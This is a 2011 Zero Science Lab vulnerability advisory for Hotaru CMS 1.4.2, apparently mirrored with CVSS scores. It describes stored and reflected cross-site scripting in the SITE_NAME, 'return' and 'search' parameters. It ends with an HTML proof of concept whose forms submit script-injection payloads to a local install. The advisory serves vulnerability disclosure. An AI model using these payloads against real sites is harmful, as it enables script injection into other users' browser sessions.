Gjoko KrsticZSL-2011-5057Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.01 Low
EPSS
Percentile
83.9%
Title: Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability
Advisory ID: ZSL-2011-5057
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 13.11.2011
Summary
Hotaru CMS is an open source, PHP platform for building your own websites. With flexible plugins and themes, you can make any site you like.
Description
The CMS suffers from multiple XSS vulnerabilities. Input thru the POST parameters ‘SITE_NAME’ (stored), ‘return’ (reflected) and the GET parameter ‘search’ (reflected) thru Hotaru.php, are not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site.
Vendor
Hotaru CMS - <http://www.hotarucms.org>
Affected Version
1.4.2
Tested On
Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
MySQL 5.5.16
PHP 5.3.8
Vendor Status
N/A
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://packetstormsecurity.org/files/106938>
[2] <http://securityreason.com/wlb_show/WLB-2011110045>
[3] <http://secunia.com/advisories/46842/>
[4] <http://www.securityfocus.com/bid/50657>
[5] <http://osvdb.org/show/osvdb/77095>
[6] <http://xforce.iss.net/xforce/xfdb/71300>
[7] <http://xforce.iss.net/xforce/xfdb/71301>
[8] <http://xforce.iss.net/xforce/xfdb/71302>
[9] <http://osvdb.org/show/osvdb/77680>
[10] <https://vulners.com/cve/CVE-2011-4709>
[11] <http://www.naked-security.com/nsa/201744.htm>
Changelog
[13.11.2011] - Initial release
[14.11.2011] - Added reference [1], [2] and [3]
[15.11.2011] - Added reference [4], [5], [6], [7] and [8]
[12.01.2012] - Added reference [9], [10] and [11]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<!--
Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability
Vendor: Hotaru CMS
Product web page: http://www.hotarucms.org
Affected version: 1.4.2
Summary: Hotaru CMS is an open source, PHP platform for building
your own websites. With flexible plugins and themes, you can make
any site you like.
Desc: The CMS suffers from multiple XSS vulnerabilities. Input thru
the POST parameters 'SITE_NAME' (stored), 'return' (reflected) and
the GET parameter 'search' (reflected) thru Hotaru.php, are not
sanitized allowing the attacker to execute HTML code into user's
browser session on the affected site.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
MySQL 5.5.16
PHP 5.3.8
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Advisory ID: ZSL-2011-5057
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5057.php
12.11.2011
--><html>
<head><title>Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability</title>
</head><body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script><br/>
<form action="http://localhost/hotaru-1-4-2/admin_index.php?page=settings" enctype="application/x-www-form-urlencoded" id="xss1" method="POST">
<input name="SITE_OPEN" type="hidden" value="true"/>
<input name="SITE_NAME" type="hidden" value='"><script>alert(1)</script>'/>
<input name="THEME" type="hidden" value="default/"/>
<input name="ADMIN_THEME" type="hidden" value="admin_default/"/>
<input name="DEBUG" type="hidden" value="true"/>
<input name="FRIENDLY_URLS" type="hidden" value="false"/>
<input name="DB_CACHE" type="hidden" value="false"/>
<input name="CSS_JS_CACHE" type="hidden" value="true"/>
<input name="HTML_CACHE" type="hidden" value="true"/>
<input name="LANG_CACHE" type="hidden" value="true"/>
<input name="RSS_CACHE" type="hidden" value="true"/>
<input name="SITE_EMAIL" type="hidden" value="[email protected]"/>
<input name="SMTP" type="hidden" value="false"/>
<input name="SMTP_HOST" type="hidden" value="mail.zeroscience.mk"/>
<input name="SMTP_PORT" type="hidden" value="25"/>
<input name="SMTP_USERNAME" type="hidden" value=""/>
<input name="SMTP_PASSWORD" type="hidden" value=""/>
<input name="settings_update" type="hidden" value="true"/>
<input name="csrf" type="hidden" value="48202665ee5176f8a813e4a865381f02"/></form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>SITE_NAME Param</h3></center></a><br/>
<form action="http://localhost/hotaru-1-4-2/index.php" enctype="application/x-www-form-urlencoded" id="xss2" method="POST">
<input name="csrf" type="hidden" value="83405717529ac232d387c8df3cdb01d1"/>
<input name="page" type="hidden" value="login"/>
<input name="password" type="hidden" value=""/>
<input name="remember" type="hidden" value="1"/>
<input name="return" type="hidden" value="%22%20onmouseover%3dprompt%28111%29%20bad%3d%22"/>
<input name="username" type="hidden" value=""/></form>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>return Param</h3></center></a><br/>
<a href="http://localhost/hotaru-1-4-2/index.php?search=%22%20onmouseover%3dprompt%28111%29%20bad%3d%22" style="text-decoration:none">
<b><font color="red"></font></b><center><h3>search Param</h3></center></a></body>
</html>
Related
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.01 Low
EPSS
Percentile
83.9%